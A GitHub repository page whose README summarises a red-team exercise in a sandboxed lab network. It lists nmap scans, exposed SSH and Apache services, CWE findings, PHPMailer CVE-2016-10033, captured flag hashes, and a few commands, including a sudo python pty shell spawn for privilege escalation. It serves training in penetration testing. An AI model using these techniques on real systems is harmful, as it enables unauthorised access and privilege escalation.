Skip to content

jasonsett/Pentest

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits

Attack

Attack

 
 

Images

Images

 
 

README.md

README.md

 
 

Repository files navigation

Red Team: Summary of Operations

Table of Contents

  • Exposed Services
  • Critical Vulnerabilities
  • Exploitation

Exposed Services

Nmap scan results for each machine reveal the below services and OS details:

Target 1

$ nmap -sV --version-all 192.168.1.110

Target 2

$ nmap -sV -O 192.168.1.115

ELK Server

$ nmap -sV --version-all 192.168.1.100

Capstone

$ nmap -sV --version-all 192.168.1.105

Kali

$ nmap -sV --version-all 192.168.1.90

NAT Switch

$ nmap -sV --version-all 192.168.1.1

These scans identified the services below as potential points of entry for Targets 1 and 2:

Target 1

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 (Debian)

Target 2

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 (Debian)

The following vulnerabilities were identified on Target 1:

  1. Exposure of Information through Directory Listing (CWE-548) -- Severity: Low

  2. Weak Password Requirements (CWE-521)

  • Severity: High
  1. Improper Access Control (CWE-284)
  • Severity: High
  1. Improper Privilege Management (CWE-269)
  • Severity: High

In addition to the vulnerabilites above, these vulnerabilities were exploited on Target 2:

  1. Remote Code Execution (CVE-2016-10033)
  • Severity: High



  1. Command Injection (CWE-77)
  • Severity: High



Exploitation

The Red Team was able to penetrate Target 1 and retrieve the following confidential data:

  • flag1.txt: b9bbcb33e11b80be759c4e844862482d
    • Exploit Used: CWE-548: Exposure of Information through Directory Listing
$ nano /var/www/html/service.html

  • flag2.txt: fc3fd58dcdad9ab23faca6e9a36e581c
    • Exploit Used: CWE-521: Weak Password Requirements
$ cat /var/www/flag2.txt

  • flag3.txt: afc01ab56b50591e7dccf93122770cd2
    • Exploit Used: CWE-284: Improper Access Control
$ mysql> SELECT * FROM wp_posts;

  • flag4.txt: 715dea6c055b9fe3337544932f2941ce
    • Exploit Used: _CWE-269: Improper Privilege Management
$ sudo python -c 'import pty;pty.spawn("bin/bash")'


The team also penetrated Target 2 and retrieved additional confidential data:

  • flag1.txt: a2c1f66d2b8051bd3a5874b5b6e43e21
    • Exploit Used: Remote Code Execution
    • URL: 192.168.1.115/vendor/PATH

  • flag2.txt: 6a8ed560f0b5358ecf844108048eb337
    • Exploit Used: Command Injection
$ cat /var/www/flag2.txt

  • flag3.txt: a0f568aa9de277887f37730d71520d9b
    • Exploit Used: Command Injection
    • URL: 192.168.1.115/wordpress/wp-content/uploads/2018/11/flag3.png

A more detailed walkthrough of these attacks can be found in Attack/Offensive Presentation.pptx

About

A sandbox environment was configured to monitor a virtual network with a Kali Linux attacking machine, and two target machines.

Topics

attack penetration-testing pentesting

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages